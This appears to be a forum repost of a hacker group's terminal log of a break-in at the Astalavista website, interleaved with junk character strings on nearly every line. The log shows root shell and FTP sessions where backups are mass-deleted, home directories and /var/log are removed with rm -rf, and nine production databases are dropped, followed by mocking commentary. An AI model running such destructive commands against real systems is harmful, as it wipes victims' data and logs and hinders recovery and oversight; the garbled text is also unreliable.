1 n5 w/ Q" j3 q1 U; I% x! J+——————+———————————————————————————————+, ^9 v2 ^, z. n. x3 d: a) A) n
| iss_summary      | iss_description                                                                             |
' Y9 o# S4 r3 i% [4 \; o1 M) ?0 E6 B+——————+———————————————————————————————+
" }, i, W( {7 P* i| Website guidance | Virtual Girl which guides you trought the website.6 p% o( u+ g2 o' V

1 v# M9 M7 E. J4 f: gWe need a girl with who you can ( talk )!!!
- C' D2 Z: f( r" _( p) M% TAlso for the News!4 |' k5 n$ m2 s$ }3 d. j. `4 h
So my suggestion is a girl who read you the news loud if you like!1 d' r7 @% B+ x" [+ }
you can choose between read yourselfe or she read it for you or both!
+ B8 }+ A" a7 [0 S6 I
; L, a  g# e3 `, a8 nGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!: }/ P0 E, y. f
/ o5 C0 K3 [( e1 P8 n: m/ |
Have a look on the example girls!!( N: ]1 [4 z2 @! c" a
: s% I' i& P. {
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
! C# S  }% o% v2 n$ L
7 B4 h) Z% E. k+ s" |! v( Tor that
- c" C  y1 X( @: z9 T' M+ Z6 }! {# w( y% e) s) M
链接标记[url]http://www.yellostrom.de/[/url]
* a$ G) n% w. W  G$ l9 F1 G% c4 O* {0 x$ N: o. o5 u6 j% V
|
* w  w1 t* ]; R* @  V+ J$ ?+——————+———————————————————————————————+  V" `  s# @( J" o2 u
1 row in set (0.00 sec)
# c1 q2 z( ?* `% @6 s$ l, u/ T$ x3 ^
// ha ha.
+ q% V& Z  K) o7 o3 g, z# A/ C/ g: s' A' C' S
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
2 F# \. R2 @6 C" Q( Q9 s+————————–+———————————————————————————————————–+
0 @6 s) _2 l2 ], c( `, u1 f# ~| iss_summary              | iss_description                                                                                           |' ]/ V$ t. i, O8 b8 A
+————————–+———————————————————————————————————–+
  J& ~: s& E6 N* h| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name.  |# f% c* Z$ h  _8 f
+————————–+———————————————————————————————————–+" [$ u9 H; W$ {4 o+ s
1 row in set (0.00 sec)
0 C9 H# z" Y2 Q" X* I. B/ i
/ [" ]$ p( t3 a// LOL.1 n7 g, C( I/ s. f, c1 j
/ G) a% E8 A* ^  s! \
mysql> exit
& V+ j5 @7 p! ?3 x' g/ YBye( }6 [4 V- H- R) f* R2 |" \

+ {1 X' ^- J/ `: msh-3.2# ftp 212.254.194.163( L  K! Q2 f- K7 A' |8 x! f! v. j" B
Connected to 212.254.194.163.( ^! Z7 d) \% i1 {
220 BackupCOM_VW FTP server ready.* F6 {% l, u! F! b% q
504 AUTH: security mechanism ‘GSSAPI’ not supported.0 h3 o! o! Y' P1 c7 m; f) {
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
2 J, y2 J  K  m( ?* `1 b: E* MKERBEROS_V4 rejected as an authentication type+ j3 t4 o; T  \1 l7 x. w8 L9 i
Name (212.254.194.163:root): astalavista.com( Y5 m; C9 n! f1 h
331 Password required for astalavista.com.6 H! ~- S, b$ z9 D$ X4 u! m- O; Z- X
Password:
, v& ?+ R  X3 q& W230 User astalavista.com logged in.
7 E9 Q1 n9 |  A/ S; \  M$ b8 K9 o# vRemote system type is UNIX.
7 J7 u- E7 R6 p3 IUsing binary mode to transfer files.
) {! u! z" d! A, e# H  Wftp> ls -la! N. U# o" [, O; {  p
227 Entering Passive Mode (212,254,194,163,2,188)  X1 }) A, |6 _$ V( S7 [; u' l) w
150 Opening BINARY mode data connection for ‘file list’.% N# H, s8 u1 r
dr-x——   1 root users         4096 Jun  4 06:13 astalavista.com
7 `4 y: D3 z: @% g5 i$ D0 F9 ]226 Transfer complete.
% l3 h3 n# |+ e$ R7 [- E) _( {5 l) k3 Uftp> cd astalavista.com% Q# R# z7 H+ \+ W% C
250 CWD command successful.
0 `+ n1 i9 V* z" Rftp> ls -la
- U( ?0 p; Y0 o9 b: v227 Entering Passive Mode (212,254,194,163,2,189)
; a' r1 s* r8 b* F9 {150 Opening BINARY mode data connection for ‘file list’.7 E! i% I! ^% B- Z$ a. T
-rw-rw-rw-   1 astalavista.com users     23410936878 Apr 29 22:10 09-04-28-astacom_full.tar+ F- b. i+ N5 s3 `& |
-rw-rw-rw-   1 astalavista.com users     20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2- q% y; i6 Z4 `! t4 F  O
-rw-rw-rw-   1 astalavista.com users        88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2; r2 a" }- J5 d' H: i0 ^4 n4 `
-rw-rw-rw-   1 astalavista.com users     26413034040 May  2 00:21 09-05-01-astacom-Public_HTML.tar. y+ {+ r1 ]9 |  c( g6 E# @* N6 }+ e
-rw-rw-rw-   1 astalavista.com users       277843549 May  1 17:29 09-05-01-astacom-SQL_Dump.tar6 _( x( v2 b; a; d9 V
[snip]
2 D2 }5 T, B$ H3 s" ^# S226 Transfer complete.7 u; S, C/ G0 N! Z# X; i: I4 S2 q: y6 O
ftp> mdelete *% z; ~) M. l4 L& v
ftp> ls -la4 x: w9 g4 I1 X5 B
227 Entering Passive Mode (212,254,194,163,2,193)
1 M" g0 V" M+ }2 k. L1 R150 Opening BINARY mode data connection for ‘file list’.
( d0 u. V0 t: I" M8 U# {226 Transfer complete.5 A" {: X& p0 v/ z5 ?4 a
ftp>
& D$ N; z) c$ T" I( h' C" j9 b
" X" [. ?+ i# I- j* h3 Ysh-3.2# cd /home
; ?9 b  {& G/ r* ^1 I* Esh-3.2# ls -la
" M2 g, M( I* q, f: x' Atotal 1200 r( R& r, E  D4 H5 ?
drwxr-xr-x 14 root    root     4096 Mar 11 17:56 ., T# q. r$ H2 H: H
drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..' ~! e) J$ `; ^5 H
drwx–x–x  9 admin   admin    4096 Nov 28  2007 admin2 W) t3 o* \; A5 r0 E5 u+ w5 s
-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group2 W- x  n+ ?5 x5 U* n0 p1 C, D" X
-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user
1 U* \+ L( e0 Kdrwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet2 M/ i1 B1 t7 B
drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup  \7 c1 F. I7 K$ O/ L) ~
drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161
& O, J, q/ }6 [5 v, v& ?% z9 Udrwx–x–x 10 com     com      4096 Apr 28 12:40 com
  C7 H  b  x, @2 ^5 M  k; Fdrwxr-xr-x  2 root    root     4096 May 17  2007 ftp
- _2 Y- N! u) o) Z9 W, zdrwx——  3 jon     jon      4096 Sep 21  2007 jon
: D/ A- D3 Z; ?6 L# j$ F6 \drwx——  2 root    root    16384 Sep 11  2007 lost+found( [7 ]  f0 p& A- g/ `
drwxr-xr-x  2 root    root     4096 Sep 14  2007 my
. J9 P, D5 R# q1 K8 ldrwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata# v$ A0 G& _! Y) j
drwx——  2 jon     jon      4096 Sep 15  2007 test
/ h* a+ q# [5 E7 B- ^( zdrwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp- s1 B% ]4 P% |
2 U( T# {8 }0 b" d% z4 t+ D
sh-3.2# rm -rf backup/: z+ a2 D* Q& P4 J8 d
sh-3.2# rm -rf backup.14161/
9 w* t: G* g" g) vsh-3.2# rm -rf ftp/3 B5 X+ x$ Q. D8 B* w
sh-3.2# rm -rf jon/9 I( V4 a2 O3 V
sh-3.2# rm -rf my/
) F: ~$ X2 I) z+ R# Q& ?$ a/ Q) esh-3.2# rm -rf mysqldata/: C' I! G1 I' H+ m
sh-3.2# rm -rf test/
" U( F$ t" x5 L2 W: A3 Bsh-3.2# rm -rf tmp/
: Y: A  b7 {; B) ?3 [' p, W* m% vsh-3.2# cd ~
5 }5 r3 Z$ x) {% {! vsh-3.2# rm -rf *
* s1 J2 E8 E4 V- Csh-3.2# rm -rf /var/log/% Q8 }& f" k! v0 P  \2 ?
rm: cannot remove directory `/var/log//proftpd’: Directory not empty2 m, Y! {6 [) Q- b$ F$ P# @
sh-3.2# rm -rf /home/*
( ]1 g+ L5 ~5 x3 `/ z4 O. Wsh-3.2# mysql
) r& J0 o" Y! W8 {7 Q0 ]2 LWelcome to the MySQL monitor.  Commands end with ; or \g.
% W- {5 I1 o9 `! \$ i) T6 \Your MySQL connection id is 407156* F3 ]* C+ W( ]
Server version: 5.0.45-community-log MySQL Community Edition (GPL)/ M9 F6 p8 V% Y, Z/ D& H0 D" P* x

* W1 d" l9 L6 U: I  u" h. RType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.; P1 t1 t- I2 U2 A

! ]5 q, O4 V! S2 Imysql> show databases;
$ O. z/ J* m7 J& e. n3 }+———————–+
, |/ Y7 w1 s8 K3 D! N: `| Database              |. I8 I" R2 j% j5 g5 H* J
+———————–+
, Z) z$ e  x5 t  ]| information_schema    |
9 o0 L* U0 {3 r; s$ `| astanet_ads           |
" s  L8 v7 o# X# I: l| astanet_mailing_lists |  Z4 e4 R+ b7 O+ ?  p
| astanet_mediawiki     |( q' U; t# E) m8 S
| astanet_membersystem  |
6 q4 @  Z% A( E  L  ^; U| com_contrexx          |
0 h% n$ a1 B/ S9 C4 l* b: J  E9 V| com_contrexx2         |9 M- B5 h+ W2 g/ t5 D
| com_contrexx2_live    |
& [! ?: m( b" c& N( Y| da_roundcube          |
- U) {  E% A4 x6 k3 s+ j| dolphin               |/ i3 o5 Q) t% `( k* e
| ideapool              |
8 Y" [( ~7 ]8 P" E  o| mysql                 |9 U) a+ R$ `& S6 T
| test                  |
* V& W) S; u& G2 C* f0 J| yourmaster            |7 a1 M: P  z6 U& o
+———————–+( E9 L, ]% b, I  u
14 rows in set (0.03 sec)5 V! ]* v9 C: i# y+ L, m; d
5 {2 h8 r/ H0 N# V
mysql> drop database astanet_membersystem;
6 |3 P. s& ?0 o2 idroQuery OK, 46 rows affected (0.81 sec)3 P0 ^, u3 r2 D! W8 T

: e9 T; U; A/ X" a) m* Wmysql> drop database com_contrexx;
/ m% j7 ]; L/ t: ~- dQuery OK, 211 rows affected (2.72 sec)
4 z( u7 Y) E" ]" G
  L& m0 a- X9 Hmysql> drop database com_contrexx2;
# H+ @! C1 i5 }( |9 Y" XQuery OK, 237 rows affected (2.23 sec)
0 E9 F; H4 f8 R% m) t# u: ^3 O
$ ]# i% l$ {% D, ?* C* dmysql> drop database com_contrexx2_live;
+ E" l9 s" R) d: h% `Query OK, 227 rows affected (7.63 sec)- c3 ^3 |! ]$ Z3 P. U- y7 n* T
8 t2 K3 k- ^5 L8 u; |6 T8 ]" n
mysql> drop database ideapool;" ?( h: w% i6 Q
Query OK, 69 rows affected (0.19 sec)) F5 e8 s7 i' C& g

3 R/ B3 e) `, f3 _. Omysql> drop database yourmaster;) q$ ]  y7 Q2 @9 q
Query OK, 158 rows affected (0.55 sec)
  w% ?: {4 f, b0 ]% [9 z; F4 U; h3 u; u# q9 `8 O
mysql> drop database astanet_ads;
2 u/ @# e) j% v9 s: v4 E6 s5 {4 ZQuery OK, 9 rows affected (0.11 sec)
! F  x" g1 e8 E2 I3 t
9 m- {$ p4 r" ]  \: G* rmysql> drop database astanet_mailing_lists;
9 M4 V7 I7 H$ J. o+ d% V. {& s! xQuery OK, 24 rows affected (1.47 sec)
& [# C, I- E* C5 e/ j# e: ^2 t. I/ ^/ A% i* r; a, n
mysql> drop database astanet_mediawiki;# H* j+ b1 H& _4 i4 ^" u, F
Query OK, 31 rows affected (0.51 sec)! f, j  }0 U! I9 T- ~& o0 P, L

! M' {& p) a6 s4 L2 F6 `: y( ^1 A! Z- Kmysql> show databases;
& ?6 y' A3 z& X+ T8 ]8 {+——————–+) v( ?- t! u) o) q
| Database           |0 ]; _8 U4 q7 _: a
+——————–+: N. [  `9 L$ O+ H
| information_schema |
1 E& H. s: z5 c| da_roundcube       |
1 B9 W0 y* F* H# p( g  `1 f7 \| dolphin            |/ z5 ~3 n4 \+ {( Z, p
| mysql              |
" y; n% P8 c+ f1 |5 c% D! r| test               |
! u1 A' ]6 ^0 x+——————–+
% ~( E4 w8 w7 u8 _( J5 rows in set (0.00 sec)' a  k; y5 q$ e0 O+ Q6 c0 H

4 A9 L( M6 i3 E- w0 nWhat a journey! We’re not sure exactly why the “Terminator” had any influence on
. o1 C9 z0 ~! \& ^4 ^6 V5 |* Ctheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the
% {. x( I! s1 {% l" i3 {wrong to say this pack of morons *wont be back*.
+ u% y* V* W1 i3 S2 L# G. x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表